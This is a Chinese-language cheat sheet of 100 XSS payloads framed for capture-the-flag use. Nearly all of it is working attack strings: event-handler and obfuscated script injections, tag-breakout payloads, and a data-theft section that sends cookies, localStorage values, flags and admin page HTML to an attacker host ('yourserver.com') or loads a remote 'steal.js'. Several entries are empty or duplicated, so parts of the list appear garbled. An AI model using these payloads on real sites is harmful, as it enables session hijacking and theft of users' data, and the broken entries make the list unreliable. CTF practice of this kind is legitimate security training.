CTF中100个常用XSS Payload 基础标签 Payload (1-20) ``` ``` ``` ``` ``` <a href="javascript:alert(1)">Click</a> ``` ``` <details open ontoggle=alert(1)> ``` ``` <input onfocus=alert(1) autofocus> ``` ``` <video poster=x onerror=alert(1)> ``` ``` <audio src=x onerror=alert(1)> ``` ``` <marquee onstart=alert(1)> ``` ``` <form onsubmit=alert(1)><input type=submit> ``` ``` <select onfocus=alert(1) autofocus> ``` ``` <textarea onfocus=alert(1) autofocus> ``` ``` <keygen autofocus onfocus=alert(1)> ``` ``` <isindex type=image src=1 onerror=alert(1)> ``` ``` <object data="javascript:alert(1)"> ``` ``` <embed src="javascript:alert(1)"> ``` ## 事件处理器 Payload (21-40) ``` <img src=x onmouseover=alert(1)> ``` ``` <img src=x onclick=alert(1)> ``` ``` <img src=x onload=alert(1)> ``` ``` <div onmouseover=alert(1)>Hover</div> ``` ``` <p onclick=alert(1)>Click</p> ``` ``` <span onmousedown=alert(1)>Press</span> ``` ``` <div ondblclick=alert(1)>Double Click</div> ``` ``` <input onblur=alert(1) autofocus> ``` ``` <input onchange=alert(1)> ``` ``` <input onkeypress=alert(1)> ``` ``` <body onunload=alert(1)> ``` ``` <body onbeforeunload=alert(1)> ``` ``` <body onresize=alert(1)> ``` ``` <body onscroll=alert(1)> ``` ``` <img src=x onerror=confirm(1)> ``` ``` <img src=x onerror=prompt(1)> ``` ``` <img src=x onerror=print()> ``` ``` <style onload=alert(1)></style> ``` ``` <link rel=stylesheet onerror=alert(1)> ``` ``` <meta http-equiv="refresh" content="0;url=javascript:alert(1)"> ``` ## 编码和混淆 Payload (41-60) ``` <script>alert(1)</script> ``` ``` <script>alert(1)</script> ``` ``` <img src=x onerror=alert(1)> ``` ``` <script>\u0061\u006c\u0065\u0072\u0074(1)</script> ``` ``` <a href="javascript:\u0061\u006c\u0065\u0072\u0074(1)">Click</a> ``` ``` <script>eval('al'+'ert(1)')</script> ``` ``` <img src=x onerror="a='al';b='ert';window[a+b](1)"> ``` ``` <script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script> ``` ``` <ScRiPt>alert(1)</ScRiPt> ``` ``` <IMG SRC=x ONERROR=alert(1)> ``` ``` <script/**/>alert(1)</script> ``` ``` <img/src=x/onerror=alert(1)> ``` ``` <img src="x" onerror="alert(1)"> ``` ``` <img src='x' onerror='alert(1)'> ``` ``` <img src=x onerror=alert (1)> ``` ``` <img src=x onerror=alert(1)// ``` ``` <img src=x onerror=alert(1)>// ``` ``` <script>setTimeout('alert(1)')</script> ``` ``` <script>setInterval('alert(1)')</script> ``` ``` <script>Function('alert(1)')()</script> ``` ## 数据窃取 Payload (61-80) ``` <script>fetch('http://yourserver.com/?c='+document.cookie)</script> ``` ``` <img src=x onerror="this.src='http://yourserver.com/?c='+document.cookie"> ``` ``` <script>location.href='http://yourserver.com/?c='+document.cookie</script> ``` ``` <script>var i=new Image();i.src='http://yourserver.com/?c='+document.cookie</script> ``` ``` <script>navigator.sendBeacon('http://yourserver.com/',document.cookie)</script> ``` ``` <script>var x=new XMLHttpRequest();x.open('GET','http://yourserver.com/?c='+document.cookie);x.send()</script> ``` ``` <script>document.location='http://yourserver.com/?c='+document.cookie</script> ``` ``` <iframe src="http://yourserver.com/?c=" onload="this.src+=document.cookie"> ``` ``` <script>fetch('http://yourserver.com/',{method:'POST',body:document.cookie})</script> ``` ``` <form action="http://yourserver.com/" method="post"><input name="c" value="'+document.cookie+'"></form> ``` ``` <script>var s=document.createElement('script');s.src='http://yourserver.com/steal.js';document.body.appendChild(s)</script> ``` ``` <img src=x onerror="fetch('/admin/flag').then(r=>r.text()).then(d=>fetch('http://yourserver.com/?f='+d))"> ``` ``` <script>fetch('/admin').then(r=>r.text()).then(h=>fetch('http://yourserver.com/?html='+btoa(h)))</script> ``` ``` <script>var k=document.querySelector('#flag').innerHTML;fetch('http://yourserver.com/?flag='+k)</script> ``` ``` <img src=x onerror="var f=localStorage.getItem('flag');this.src='http://yourserver.com/?f='+f"> ``` ``` <script>var c=document.cookie;var i=new Image();i.src='http://yourserver.com/?'+c</script> ``` ``` <script>window.onload=function(){var d=document.documentElement.outerHTML;fetch('http://yourserver.com/',{method:'POST',body:d})}</script> ``` ``` <script>var form=new FormData();form.append('cookie',document.cookie);fetch('http://yourserver.com/',{method:'POST',body:form})</script> ``` ``` <link rel="pingback" href="http://yourserver.com/?c=document.cookie"> ``` ``` <script>performance.mark('x');performance.measure('x');var e=performance.getEntriesByType('measure')[0];fetch('http://yourserver.com/?perf='+e.duration)</script> ``` ## DOM 和高级 Payload (81-100) ``` "><script>alert(1)</script> ``` ``` '><script>alert(1)</script> ``` ``` </script><script>alert(1)</script> ``` ``` </style><script>alert(1)</script> ``` ``` <img src="x" onerror="alert(1)"> ``` ``` <img src="http://x" onerror="alert(1)"> ``` ``` <img src=1 onerror=alert(1)> ``` ``` <img src=javascript:alert(1)> ``` ``` <img src="javascript:alert(1)"> ``` ``` <iframe src=javascript:alert(1)> ``` ``` ``` ``` ``` ``` click ``` ``` ``` ``` ``` ``` click ``` ``` ``` ``` ``` ``` Click ``` ``` Click ```